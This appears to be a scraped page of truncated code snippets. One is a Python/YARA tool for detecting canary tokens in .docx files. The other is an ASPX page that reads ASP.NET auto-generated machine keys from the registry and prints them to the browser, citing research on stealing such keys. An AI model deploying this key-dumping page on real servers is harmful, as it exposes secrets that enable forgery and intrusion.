Remember to unzip the .docx first, or use scan.sh.
Compile the yara rule for scan.sh to work
yarac canarytoken.yar canarytoken
#!/usr/bin/python3 | |
import re | |
import zipfile | |
import argparse | |
from urllib.parse import urlparse | |
from colorama import Fore | |
from colorama import Style | |
from colorama import init |
Remember to unzip the .docx first, or use scan.sh.
Compile the yara rule for scan.sh to work
yarac canarytoken.yar canarytoken
<%@ Page Language="C#" %> | |
<% | |
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/ | |
Response.Write("<br/><hr/>"); | |
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{}); | |
if(autoGenKeyV4!=null) | |
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty)); | |
Response.Write("<br/>"); | |
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{}); | |
if(autoGenKey!=null) |